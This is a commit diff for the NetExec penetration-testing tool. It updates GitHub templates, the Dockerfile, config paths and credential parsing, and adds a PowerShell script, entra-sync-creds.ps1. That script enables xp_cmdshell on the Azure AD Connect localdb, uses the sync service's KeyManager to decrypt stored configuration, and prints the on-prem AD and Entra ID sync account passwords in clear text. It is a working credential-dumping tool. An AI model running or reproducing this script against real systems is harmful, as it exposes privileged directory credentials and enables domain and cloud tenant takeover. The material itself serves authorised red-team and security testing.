Resolve merge conflicts and sync fork with upstream

Author: Mercury0

.github/ISSUE_TEMPLATE/bug_report.md

@@ -1,3 +1,5 @@
+# ❗❗❗ Before filing this bug report, MAKE SURE you have already downloaded the newest version of NetExec from GitHub and installed it! Many issues have already been reported and fixed, _especially_ if you are running the native Kali version! Please delete this line before submitting your issue if you have done so.❗❗❗
+
 ---
 name: Bug report
 about: Create a report to help us improve
@@ -7,6 +9,8 @@ assignees: ''
 
 ---
 
+
+
 **Describe the bug**
 A clear and concise description of what the bug is.
 
@@ -30,8 +34,8 @@ If applicable, add screenshots to help explain your problem.
 
 **NetExec info**
  - OS: [e.g. Kali]
- - Version of nxc: [e.g. v1.5.2]
- - Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
+ - Version of nxc: [e.g. v1.5.2] (run nxc --version and post the _exact_ string that is output)
+ - Installed from: apt/github/pip/docker/...? Please try with latest release before opening an issue
 
 **Additional context**
 Add any other context about the problem here.

.github/PULL_REQUEST_TEMPLATE.md

@@ -4,9 +4,12 @@ Please include a summary of the change and which issue is fixed, or what the enh
 List any dependencies that are required for this change.
 
 ## Type of change
+Insert an "x" inside the brackets for relevant items (do not delete options)
+
 - [ ] Bug fix (non-breaking change which fixes an issue)
 - [ ] New feature (non-breaking change which adds functionality)
 - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
+- [ ] Deprecation of feature or functionality
 - [ ] This change requires a documentation update
 - [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
 
@@ -21,9 +24,10 @@ Screenshots are always nice to have and can give a visual representation of the
 If appropriate include before and after screenshot(s) to show which results are to be expected.
 
 ## Checklist:
+Insert an "x" inside the brackets for completed and relevant items (do not delete options)
 
 - [ ] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
-- [ ] I have added or updated the tests/e2e_commands.txt file if necessary
+- [ ] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
 - [ ] New and existing e2e tests pass locally with my changes
 - [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
 - [ ] I have performed a self-review of my own code

Dockerfile

@@ -1,22 +1,45 @@
-FROM python:3.11-slim
-
+FROM python:3.13-slim-bookworm AS builder
 ENV LANG=C.UTF-8
 ENV LC_ALL=C.UTF-8
 ENV PIP_NO_CACHE_DIR=off
 
 WORKDIR /usr/src/netexec
 
-RUN apt-get update && \
-    apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
-RUN apt-get update
-# Get Rust
-RUN curl https://sh.rustup.rs -sSf | bash -s -- -y
-# Add .cargo/bin to PATH
+RUN apt update && \
+    apt install -y --no-install-recommends \
+        libffi-dev \
+        libxml2-dev \
+        libxslt-dev \
+        libssl-dev \
+        openssl \
+        autoconf \
+        g++ \
+        python3-dev \
+        curl \
+        git \
+        unzip \
+    && apt clean && rm -rf /var/lib/apt/lists/*
+
+RUN curl https://sh.rustup.rs -sSf | bash -s -- -y --default-toolchain stable
 ENV PATH="/root/.cargo/bin:${PATH}"
-# Check cargo is visible
-RUN cargo --help
 
-COPY . .
-RUN pip install .
+RUN git clone https://github.com/Pennyw0rth/NetExec.git . \
+    && pip install .
+
+FROM python:3.13-slim-bookworm
+
+ENV LANG=C.UTF-8
+ENV LC_ALL=C.UTF-8
+ENV PIP_NO_CACHE_DIR=off
+
+WORKDIR /usr/src/netexec
+
+COPY --from=builder /usr/local/lib/python3.13/site-packages /usr/local/lib/python3.13/site-packages
+COPY --from=builder /usr/local/bin /usr/local/bin
+
+RUN apt update && \
+    apt install -y --no-install-recommends \
+        openssl \
+    && apt clean && rm -rf /var/lib/apt/lists/*
 
-ENTRYPOINT [ "nxc" ]
+ENTRYPOINT ["nxc"]

nxc/cli.py

@@ -25,8 +25,7 @@ def gen_cli_args():
         COMMIT = ""
         DISTANCE = ""
     CODENAME = "BLS"
-    nxc_logger.debug(f"NXC VERSION: {VERSION} - {CODENAME} - {COMMIT} - {DISTANCE}")
-
+    
     generic_parser = argparse.ArgumentParser(add_help=False, formatter_class=DisplayDefaultsNotNone)
     generic_group = generic_parser.add_argument_group("Generic", "Generic options for nxc across protocols")
     generic_group.add_argument("--version", action="store_true", help="Display nxc version")
@@ -133,7 +132,7 @@ def gen_cli_args():
     if hasattr(args, "get_output_tries"):
         args.get_output_tries = args.get_output_tries * 10
 
-    return args
+    return args, [CODENAME, VERSION, COMMIT, DISTANCE]
 
 
 def get_module_names():

nxc/config.py

@@ -1,7 +1,6 @@
-import os
 from os.path import join as path_join
 import configparser
-from nxc.paths import NXC_PATH, DATA_PATH
+from nxc.paths import DATA_PATH, CONFIG_PATH
 from nxc.first_run import first_run_setup
 from nxc.logger import nxc_logger
 from ast import literal_eval
@@ -10,25 +9,25 @@
 nxc_default_config.read(path_join(DATA_PATH, "nxc.conf"))
 
 nxc_config = configparser.ConfigParser()
-nxc_config.read(os.path.join(NXC_PATH, "nxc.conf"))
+nxc_config.read(CONFIG_PATH)
 
 if "nxc" not in nxc_config.sections():
     first_run_setup()
-    nxc_config.read(os.path.join(NXC_PATH, "nxc.conf"))
+    nxc_config.read(CONFIG_PATH)
 
 # Check if there are any missing options in the config file
 for section in nxc_default_config.sections():
     if not nxc_config.has_section(section):
         nxc_logger.display(f"Adding missing section '{section}' to nxc.conf")
         nxc_config.add_section(section)
-        with open(path_join(NXC_PATH, "nxc.conf"), "w") as config_file:
+        with open(CONFIG_PATH, "w") as config_file:
             nxc_config.write(config_file)
     for option in nxc_default_config.options(section):
         if not nxc_config.has_option(section, option):
             nxc_logger.display(f"Adding missing option '{option}' in config section '{section}' to nxc.conf")
             nxc_config.set(section, option, nxc_default_config.get(section, option))
 
-            with open(path_join(NXC_PATH, "nxc.conf"), "w") as config_file:
+            with open(CONFIG_PATH, "w") as config_file:
                 nxc_config.write(config_file)
 
 # THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE
@@ -37,7 +36,6 @@
 audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
 reveal_chars_of_pwd = int(nxc_config.get("nxc", "reveal_chars_of_pwd", fallback=0))
 config_log = nxc_config.getboolean("nxc", "log_mode", fallback=False)
-ignore_opsec = nxc_config.getboolean("nxc", "ignore_opsec", fallback=False)
 host_info_colors = literal_eval(nxc_config.get("nxc", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
 
 # Read stealth_label from user config first, then default config

nxc/connection.py

@@ -1,3 +1,5 @@
+from datetime import datetime
+import os
 import random
 import sys
 import contextlib
@@ -16,6 +18,7 @@
 from nxc.loaders.moduleloader import ModuleLoader
 from nxc.logger import nxc_logger, NXCAdapter
 from nxc.context import Context
+from nxc.paths import NXC_PATH
 from nxc.protocols.ldap.laps import laps_search
 from nxc.helpers.pfx import pfx_auth
 
@@ -137,7 +140,11 @@ def __init__(self, args, db, target):
         # Authentication info
         self.password = ""
         self.username = ""
-        self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey or (hasattr(self.args, "delegate") and self.args.delegate))
+        self.kerberos = bool(self.args.kerberos or
+                             self.args.use_kcache or
+                             self.args.aesKey or
+                             (hasattr(self.args, "delegate") and self.args.delegate) or
+                             (hasattr(self.args, "no_preauth_targets") and self.args.no_preauth_targets))
         self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
         self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
         self.admin_privs = False
@@ -153,6 +160,11 @@ def __init__(self, args, db, target):
         self.local_ip = None
         self.dns_server = self.args.dns_server
 
+        # Construct the output file template using os.path.join for OS compatibility
+        base_log_dir = os.path.join(os.path.expanduser(NXC_PATH), "logs")
+        filename_pattern = f"{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-")
+        self.output_file_template = os.path.join(base_log_dir, "{output_folder}", filename_pattern)
+
         # DNS resolution
         dns_result = self.resolver(target)
         if dns_result:
@@ -417,14 +429,14 @@ def parse_credentials(self):
                     with open(ntlm_hash) as ntlm_hash_file:
                         for i, line in enumerate(ntlm_hash_file):
                             line = line.strip()
-                            if len(line) != 32 and len(line) != 65:
+                            if len(line) != 32 and len(line) != 65 and len(line) != 0:
                                 self.logger.fail(f"Invalid NTLM hash length on line {(i + 1)} (len {len(line)}): {line}")
                                 continue
                             else:
                                 secret.append(line)
                                 cred_type.append("hash")
                 else:
-                    if len(ntlm_hash) != 32 and len(ntlm_hash) != 65:
+                    if len(ntlm_hash) != 32 and len(ntlm_hash) != 65 and len(ntlm_hash) != 0:
                         self.logger.fail(f"Invalid NTLM hash length {len(ntlm_hash)}, authentication not sent")
                         exit(1)
                     else:

nxc/context.py

@@ -1,17 +1,19 @@
 import configparser
 import os
 
+from nxc.paths import NXC_PATH, CONFIG_PATH
+
 
 class Context:
     def __init__(self, db, logger, args):
         for key, value in vars(args).items():
             setattr(self, key, value)
 
         self.db = db
-        self.log_folder_path = os.path.join(os.path.expanduser("~/.nxc"), "logs")
+        self.log_folder_path = os.path.join(NXC_PATH, "logs")
         self.localip = None
 
         self.conf = configparser.ConfigParser()
-        self.conf.read(os.path.expanduser("~/.nxc/nxc.conf"))
+        self.conf.read(CONFIG_PATH)
 
         self.log = logger

nxc/data/msol_dump/entra-sync-creds.ps1

@@ -0,0 +1,82 @@
+# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
+# Modified by @NeffIsBack:
+# - Added support for Entra ID sync credentials (original source: https://github.com/Gerenios/AADInternals-Endpoints/blob/6af2054705e900b733ba76c6e65bfa6cad2328cc/AADSyncSettings.ps1#L108-L116)
+
+# Function to decrypt the encrypted configuration of the Azure AD Connect sync stuff
+function decrypter($crypted, $key_id, $instance_id, $entropy) {
+    $cmd = $client.CreateCommand()
+    $cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
+    $reader = $cmd.ExecuteReader()
+
+    $decrypted = [string]::Empty
+
+    while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
+        $decrypted += $reader.GetString(0)
+    }
+    $reader.Close()
+
+    if ($decrypted -eq [string]::Empty) {
+        Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
+        return
+    }
+
+    return $decrypted
+}
+
+# Create a connection to the localdb instance of Azure AD Connect
+$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
+
+try {
+    $client.Open()
+} catch {
+    Write-Host "[!] Could not connect to localdb, Entra ID sync probably not installed"
+    return
+}
+
+function f {
+    param ($q)
+    $c = $client.CreateCommand()
+    $c.CommandText = $q
+    $r = $c.ExecuteReader()
+    if (-not $r.Read()) {
+        Write-Host "[!] Error querying: $q"
+        return
+    }
+    $res = for ($i = 0; $i -lt $r.FieldCount; $i++) { $r.GetValue($i) }
+    $r.Close()
+    return $res
+}
+
+# Get keyset_id, instance_id, entropy
+$out = f "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
+if (-not $out) { return }
+$key_id, $instance_id, $entropy = $out
+
+# Get and decrypt on-prem AD credentials
+$out = f "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
+if (-not $out) { return }
+$on_prem, $c = $out
+$pd = decrypter $c $key_id $instance_id $entropy
+
+# Get and decrypt Entra ID sync credentials
+$out = f "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE subtype = 'Windows Azure Active Directory (Microsoft)'"
+if (-not $out) { return }
+$entra, $c = $out
+$qd = decrypter $c $key_id $instance_id $entropy
+
+
+
+# Extract the credentials from the decrypted XML configurations
+$domain = select-xml -Content $on_prem -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
+$username = select-xml -Content $on_prem -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
+$pw = select-xml -Content $pd -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+
+Write-Host "On-prem Domain: $($domain.Domain)"
+Write-Host "On-prem Username: $($username.Username)"
+Write-Host "On-prem Password: $($pw.Password)"
+
+# Extract the Entra ID sync credentials
+$entra_user = ([xml]$entra).MAConfig.'parameter-values'.parameter[0].'#text'
+$entra_pw = select-xml -Content $qd -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+Write-Host "Entra ID Username: $($entra_user)"
+Write-Host "Entra ID Password: $($entra_pw.Password)"